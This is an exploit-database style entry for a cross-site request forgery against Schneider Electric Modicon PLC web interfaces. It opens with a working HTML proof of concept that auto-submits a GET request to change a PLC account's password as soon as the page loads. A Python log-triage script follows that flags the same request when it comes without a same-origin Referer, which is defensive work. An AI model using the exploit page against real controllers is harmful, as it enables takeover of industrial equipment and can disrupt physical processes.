# Exploit Title: Schneider Electric/Modicon PLC - CSRF Vulnerability
# Date: 2018-05-18
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.schneider-electric.com/
# Version: BMXNOC0401, BMXNOE0100, BMXNOE0110, BMXNOE0110H, BMXNOR0200H, BMXP342020, BMXP342020H, BMXP342030, BMXP3420302, BMXP3420302H, and BMXP342030H.
# Tested on: Windows 8 OS and Chrome Explorer
# Greetz: Jameel Nabbo
# PoC
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
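<!-- The password change is an ordinary GET request: every value travels in the query string and the request carries no anti-CSRF token. TargetAdress, USERNAME and PASSWORD are placeholders. -->
<form action="http://TargetAdress/secure/embedded/builtin?Language=undefined&user=USERNAME&passwd=PASSWORD&cnfpasswd=PASSWORD&subhttppwd=Change+Password"
method="get">
</form>
<script>
// Submit the form as soon as the page loads, with no user interaction.
document.forms[0].submit();
</script>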
</body>
</html>
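# Detection (added example, not part of the original PoC): a Python triage script that finds the password-change request above in web access logs and flags it when the Referer is missing or does not point at the PLC itself. It assumes a proxy or gateway in front of the PLC writes combined-format logs; the log lines, the 192.0.2.10 PLC address and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and submit parameter come from the PoC request on this page.
PWD_PATH = "/secure/embedded/builtin"
SUBMIT_PARAM = "subhttppwd"

# Combined log format (assumed): client - user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"')

# Constructed sample lines; 192.0.2.10 stands in for the PLC web server.
_REQ = ('GET /secure/embedded/builtin?Language=undefined&user=USER1'
        '&passwd=x&cnfpasswd=x&subhttppwd=Change+Password HTTP/1.1')
SAMPLE_LOG = [
    f'198.51.100.7 - - [18/May/2018:10:01:02 +0000] "{_REQ}" 200 512 '
    '"http://192.0.2.10/secure/embedded/builtin" "Mozilla/5.0"',
    f'198.51.100.7 - - [18/May/2018:10:07:40 +0000] "{_REQ}" 200 512 '
    '"http://pages.example/news.html" "Mozilla/5.0"',
    '198.51.100.7 - - [18/May/2018:10:08:01 +0000] "GET /index.htm HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0"',
    f'198.51.100.9 - - [18/May/2018:11:15:09 +0000] "{_REQ}" 200 512 '
    '"-" "Mozilla/5.0"',
]

def classify(line, plc_hosts):
    """Return a finding for a password-change request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    params = parse_qs(url.query, keep_blank_values=True)
    if url.path != PWD_PATH or SUBMIT_PARAM not in params:
        return None
    ref = m["referer"]
    ref_host = urlsplit(ref).hostname if ref not in ("", "-") else None
    verdict = ("no-referer" if ref_host is None else
               "same-origin" if ref_host in plc_hosts else "cross-origin")
    # The new password is in the URL; report the account only, never passwd.
    return {"client": m["client"], "time": m["ts"], "verdict": verdict,
            "user": params.get("user", [""])[0], "referer_host": ref_host}

def suspicious(lines, plc_hosts):
    """Password changes that did not come from the PLC's own pages."""
    hits = (classify(line, plc_hosts) for line in lines)
    return [h for h in hits if h and h["verdict"] != "same-origin"]

if __name__ == "__main__":
    print(*suspicious(SAMPLE_LOG, {"192.0.2.10"}), sep="\n")
```

# A missing Referer is a triage signal rather than proof, since browsers and proxies can strip the header. Because the request places the new password in the query string, logs that record it should be access-restricted.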